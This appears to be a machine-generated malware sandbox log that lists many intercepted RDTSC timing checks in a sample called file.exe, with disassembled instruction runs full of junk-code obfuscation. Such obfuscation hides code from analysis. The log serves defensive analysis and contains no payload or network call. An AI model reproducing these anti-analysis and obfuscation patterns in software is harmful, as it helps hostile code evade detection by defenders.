Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4029C second address: 4A402CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FEA44C4CAC3h 0x00000014 pop ecx 0x00000015 mov ax, di 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A402CB second address: 4A402D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A402D1 second address: 4A40318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FEA44C4CABDh 0x00000014 pushfd 0x00000015 jmp 00007FEA44C4CAC0h 0x0000001a adc esi, 1E567788h 0x00000020 jmp 00007FEA44C4CABBh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40318 second address: 4A4031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4031E second address: 4A40322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40322 second address: 4A4033A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4033A second address: 4A4033E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4033E second address: 4A40344 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40344 second address: 4A4037A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FEA44C4CAC4h 0x0000000c or si, EC48h 0x00000011 jmp 00007FEA44C4CABBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4037A second address: 4A4037E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4037E second address: 4A40384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40384 second address: 4A403B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED4Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [769B4538h] 0x0000000e pushad 0x0000000f movzx ecx, di 0x00000012 mov dx, 1F3Eh 0x00000016 popad 0x00000017 xor dword ptr [ebp-08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cx, 176Dh 0x00000021 jmp 00007FEA44C7ED4Ah 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A403B5 second address: 4A4041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA44C4CAC1h 0x00000009 sbb cx, 1976h 0x0000000e jmp 00007FEA44C4CAC1h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FEA44C4CAC0h 0x0000001a or ax, D698h 0x0000001f jmp 00007FEA44C4CABBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xor eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEA44C4CAC2h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4041C second address: 4A4046E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, B4A4h 0x00000007 mov bx, 7710h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FEA44C7ED54h 0x00000014 mov dword ptr [esp], eax 0x00000017 jmp 00007FEA44C7ED50h 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FEA44C7ED57h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A4046E second address: 4A40474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40474 second address: 4A40478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40478 second address: 4A404C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], eax 0x00000011 jmp 00007FEA44C4CAC6h 0x00000016 mov dword ptr [ebp-18h], esp 0x00000019 jmp 00007FEA44C4CAC0h 0x0000001e mov eax, dword ptr fs:[00000018h] 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 mov al, 7Fh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A404C3 second address: 4A40517 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEA44C7ED59h 0x00000008 jmp 00007FEA44C7ED4Bh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov eax, 46FE07A1h 0x00000019 popad 0x0000001a popad 0x0000001b mov ecx, dword ptr [eax+00000FDCh] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 movsx edx, cx 0x00000027 jmp 00007FEA44C7ED52h 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A40517 second address: 4A4059F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, ecx 0x0000000b jmp 00007FEA44C4CAC6h 0x00000010 jns 00007FEA44C4CB46h 0x00000016 jmp 00007FEA44C4CAC0h 0x0000001b add eax, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FEA44C4CABDh 0x00000026 sbb ax, 99E6h 0x0000002b jmp 00007FEA44C4CAC1h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FEA44C4CAC0h 0x00000037 adc ah, FFFFFF88h 0x0000003a jmp 00007FEA44C4CABBh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30023 second address: 4A30038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp], ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEA44C7ED4Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30038 second address: 4A30060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEA44C4CAC5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30060 second address: 4A300B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FEA44C7ED53h 0x0000000b sbb esi, 593C79EEh 0x00000011 jmp 00007FEA44C7ED59h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ax, di 0x00000023 jmp 00007FEA44C7ED4Fh 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A300B5 second address: 4A30124 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 pushfd 0x00000006 jmp 00007FEA44C4CABBh 0x0000000b adc cx, C4AEh 0x00000010 jmp 00007FEA44C4CAC9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c mov ecx, edi 0x0000001e pushfd 0x0000001f jmp 00007FEA44C4CAC5h 0x00000024 sub eax, 75BDE396h 0x0000002a jmp 00007FEA44C4CAC1h 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30124 second address: 4A30128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30128 second address: 4A3012E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A301A0 second address: 4A301E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov cx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, 00000000h 0x00000010 jmp 00007FEA44C7ED4Ch 0x00000015 sub edi, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FEA44C7ED4Ah 0x00000020 adc ch, 00000068h 0x00000023 jmp 00007FEA44C7ED4Bh 0x00000028 popfd 0x00000029 mov ax, 825Fh 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A301E0 second address: 4A301E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A301E6 second address: 4A30218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEA44C7ED50h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30218 second address: 4A3021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3021E second address: 4A3022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C7ED4Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3022F second address: 4A30233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30233 second address: 4A30257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA44C7ED58h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30257 second address: 4A3025C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3025C second address: 4A30298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FEA44C7ED57h 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FEA44C7EFE9h 0x00000013 jmp 00007FEA44C7ED4Fh 0x00000018 lea ecx, dword ptr [ebp-14h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30298 second address: 4A302AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FEA44C4CAC1h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3032B second address: 4A30331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30331 second address: 4A3036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEA44C4CABCh 0x00000009 sbb si, 31C8h 0x0000000e jmp 00007FEA44C4CABBh 0x00000013 popfd 0x00000014 mov di, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FEA44C4CAC1h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3036C second address: 4A303C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEA44C7ED57h 0x00000008 pop esi 0x00000009 mov cx, di 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FEA44C7ED57h 0x00000019 xor al, FFFFFFCEh 0x0000001c jmp 00007FEA44C7ED59h 0x00000021 popfd 0x00000022 mov ah, C4h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30436 second address: 4A3044E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C4CAC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3044E second address: 4A30452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30452 second address: 4A30466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007FEAB6B7AAE8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30466 second address: 4A3046A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3046A second address: 4A30482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30482 second address: 4A30500 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FEA44C7EDD3h 0x0000000f pushad 0x00000010 mov di, ax 0x00000013 jmp 00007FEA44C7ED50h 0x00000018 popad 0x00000019 cmp dword ptr [ebp-14h], edi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FEA44C7ED4Dh 0x00000025 adc eax, 3E8A7F46h 0x0000002b jmp 00007FEA44C7ED51h 0x00000030 popfd 0x00000031 pushfd 0x00000032 jmp 00007FEA44C7ED50h 0x00000037 jmp 00007FEA44C7ED55h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30500 second address: 4A3059F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 19A9h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FEAB6B7AA47h 0x00000010 jmp 00007FEA44C4CAC4h 0x00000015 mov ebx, dword ptr [ebp+08h] 0x00000018 jmp 00007FEA44C4CAC0h 0x0000001d lea eax, dword ptr [ebp-2Ch] 0x00000020 jmp 00007FEA44C4CAC0h 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FEA44C4CABEh 0x0000002d sbb si, E308h 0x00000032 jmp 00007FEA44C4CABBh 0x00000037 popfd 0x00000038 call 00007FEA44C4CAC8h 0x0000003d call 00007FEA44C4CAC2h 0x00000042 pop eax 0x00000043 pop ebx 0x00000044 popad 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3059F second address: 4A305A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, cl 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A305A6 second address: 4A305AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A305AC second address: 4A305EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007FEA44C7ED50h 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 call 00007FEA44C7ED56h 0x0000001e pop ecx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A305EE second address: 4A30634 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEA44C4CABBh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FEA44C4CAC4h 0x00000013 and ax, EEE8h 0x00000018 jmp 00007FEA44C4CABBh 0x0000001d popfd 0x0000001e movzx eax, di 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov si, 9573h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30634 second address: 4A3066E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C7ED54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FEA44C7ED50h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEA44C7ED4Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3066E second address: 4A30695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEA44C4CAC5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30695 second address: 4A306A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEA44C7ED4Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A306A5 second address: 4A306A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A306E5 second address: 4A3071C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edi 0x00000005 movzx esi, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, eax 0x0000000d jmp 00007FEA44C7ED59h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FEA44C7ED4Dh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3071C second address: 4A30722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30722 second address: 4A30726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30726 second address: 4A3072A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A3072A second address: 4A20D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FEAB6BACC69h 0x0000000e xor eax, eax 0x00000010 jmp 00007FEA44C5847Ah 0x00000015 pop esi 0x00000016 pop edi 0x00000017 pop ebx 0x00000018 leave 0x00000019 retn 0004h 0x0000001c nop 0x0000001d sub esp, 04h 0x00000020 mov esi, eax 0x00000022 cmp esi, 00000000h 0x00000025 setne al 0x00000028 xor ebx, ebx 0x0000002a test al, 01h 0x0000002c jne 00007FEA44C7ED47h 0x0000002e jmp 00007FEA44C7EE82h 0x00000033 call 00007FEA489BD944h 0x00000038 mov edi, edi 0x0000003a jmp 00007FEA44C7ED50h 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FEA44C7ED57h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20D92 second address: 4A20E6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FEA44C4CAC7h 0x00000011 sbb ch, FFFFFFCEh 0x00000014 jmp 00007FEA44C4CAC9h 0x00000019 popfd 0x0000001a jmp 00007FEA44C4CAC0h 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 movzx eax, dx 0x00000025 push edi 0x00000026 mov ecx, 3295F0D5h 0x0000002b pop esi 0x0000002c popad 0x0000002d mov ebp, esp 0x0000002f pushad 0x00000030 mov edx, 35166342h 0x00000035 call 00007FEA44C4CAC3h 0x0000003a mov dx, ax 0x0000003d pop ecx 0x0000003e popad 0x0000003f push esp 0x00000040 pushad 0x00000041 mov bx, cx 0x00000044 movzx esi, di 0x00000047 popad 0x00000048 mov dword ptr [esp], ecx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FEA44C4CABBh 0x00000052 adc esi, 0CA6CF9Eh 0x00000058 jmp 00007FEA44C4CAC9h 0x0000005d popfd 0x0000005e popad 0x0000005f mov dword ptr [ebp-04h], 55534552h 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20E6B second address: 4A20E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20E6F second address: 4A20E73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20E73 second address: 4A20E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20ECB second address: 4A20ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A20ED1 second address: 4A20ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30B14 second address: 4A30B3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CAC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FEA44C4CABCh 0x00000010 movzx esi, bx 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30B3F second address: 4A30B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30B43 second address: 4A30B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30B4E second address: 4A30BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEA44C7ED58h 0x0000000a xor al, FFFFFFD8h 0x0000000d jmp 00007FEA44C7ED4Bh 0x00000012 popfd 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FEA44C7ED56h 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEA44C7ED4Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30BA2 second address: 4A30BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA44C4CABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
